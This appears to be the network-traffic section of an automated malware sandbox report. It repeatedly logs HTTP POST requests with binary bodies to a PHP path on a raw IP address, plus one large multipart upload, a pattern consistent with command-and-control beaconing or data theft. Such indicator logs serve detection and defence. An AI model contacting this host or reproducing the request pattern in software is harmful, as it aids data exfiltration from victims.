                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2052Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2060Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----NZZp5qhoIWq2NhqjOGZR4udlu3EyxDui93User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 188810Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2140Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2152Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
